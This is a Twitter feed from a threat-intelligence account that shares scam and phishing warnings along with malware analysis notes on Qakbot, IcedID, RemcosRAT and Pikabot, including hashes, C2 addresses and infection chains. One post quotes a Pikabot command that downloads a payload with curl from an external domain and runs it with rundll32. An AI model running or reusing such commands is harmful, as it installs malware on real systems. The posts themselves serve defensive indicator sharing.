MoshsrV 🤘 🇵🇹
@moshsrv
Followers: 764 | Following: 3K | Media: 278 | Statuses: 956
0-Day's, Anti-Malware, Anti-phishing, Metal Fan, guitar player No bot's allowed.
Lisbon, Portugal
Joined August 2009
👀👇🏻
🚨New SCAM situation via phone calls. The suspect speaks English and tells the victim that they have a pending judicial/police problem and that, to resolve it, they will have to pay a fine or bail. DO NOT MAKE ANY TRANSFER OR PROVIDE PERSONAL DATA. @psplisboa
@Dropbox #phishing in a #Hungarian site URL(https): /passed.hu/wp-includes/3110a.html @urlscanio
https://t.co/wZCau4Z859
@whitehoodie4 @PhishStats @ActorExpose
👀👇🏻
Another #Qakbot MSI Infection 🚨 Similar #DFIR Exec Flow and #TTPs [+] Rundll32 T1218.011 - %AppData%\AdobeAC.dll,EditOwnerInfo [+] PH T1055.012 - (Injected Processes: wermgr.exe, backgroundTaskHost.exe, dxdiag.exe) [+] Internal DLL name: EditOwnerInfo.dll🔥
#Qakbot Resurrection #TTPs & #DFIR🦆 Exec Flow: MSI > [msiexec] > Rundll32 > Rundll32 > wermgr (Injected Process) [+] Msiexec T1218.007 [+] Rundll32 T1218.011 - %AppData%\KROST.dll,hvsi [+] PH T1055.012 - wermgr.exe [+] Internal DLL name: HvsiManagementApi.dll🔥
The customer contacted us because "Microsoft 365 Defender has detected a security threat", more precisely, the alert "Anomalous Token involving one user" was raised. We tasked the customer to give us access to their Azure Tenant so that we could investigate the logins and
🚨🚨🚨 Help 🚨🚨🚨 Beware of these requests for donations for "food for a little girl"...
#IcedID - #TA577 - url > .img > .lnk > .dll cmd /c UPDATE.html.lnk rundll32 version1.dll, scab rundll32 C:\Users\u\AppData\Roaming\Custom_update\Update_4163f3ac.dll, scab c2's https://riverhasus.]com/live/
https://mazdakrichest.]com/live/ IOC's https://t.co/2jZDhivW3q
🚨 Malicious Excel File Evaded Nearly All The AV Solutions 🚨 ⚠ Heavily Size and Obfuscated Malicious VBA Code ⚠ 📌 VT Detection: 7 / 62 📁 Filename: Approved Visit Prog of ACNS(M).xls 🔐 MD5: 3711538e51cef1d983f3e9127092e03c 🕵️♂️ IOCs: wild[.]craftupdate[.]online DOCGuard
"Comitato di monitoraggio dell'anagrafe tributaria" spam email @Agenzia_Entrate 🔥switch to #systemBc ⚠️ from #remcosrat 🌪️ 🌀Anyrun https://t.co/yL5aY8U8p6 ❇️Samples https://t.co/kADezqouc8
"Comitato di monitoraggio dell'anagrafe tributaria" spam email @Agenzia_Entrate spread #RemCosRat EML>LNK>ZIP>URL>SMB>ZIP>VHD>dll sideloading via Baidu PC Faster Samples https://t.co/kADezqouc8 Urls https://t.co/N5ISI7dwf0 SMB 62.173.141.11*4 *6 *8 Run https://t.co/foHVHiDPOT
🚨 Facebook 🚨 Beware of these emails about supposed attempts to log in to your Facebook account… Their only purpose is to steal your account!
#Pikabot - #TA577 - url > .zip > .js > curl > .ps > .dll wscript.exe JYIPY.js cmd /c CuRL https://frensterol.]com/yveu/stati -o %TmP%\SlobberShoddily.conf rundll32 %TmP%\SlobberShoddily.conf Throw c2's 45.32.232.31:13782 158.247.196.155:9785 IOC's https://t.co/kWms7me94t
🚨 Malicious CHM File Evaded Nearly All The AV Solutions 🚨 📌 VT Detection: 7/60 📁 Filename: [HF].chm 🔐 MD5: f35b05779e9538cec363ca37ab38e287 🕵️♂️ IOCs: niscarea[.]com 👉 DOCGuard Report: https://t.co/8zWSwQIWnX
🚨🚨🚨 MBWAY 🚨🚨🚨 Yet another fake page trying to rob you 👇🏻
Introducing THOR-Cloud Lite 🌩️: Seamless On-Demand Forensic Scanning Made Easy - apply YARA + Sigma + IOCs - it's free - many more features upcoming Blog 📘 https://t.co/rXgf3DUUso Release Session 📺 https://t.co/ynWU2wrewd Register for Free ⚡️ https://t.co/wazEjbN014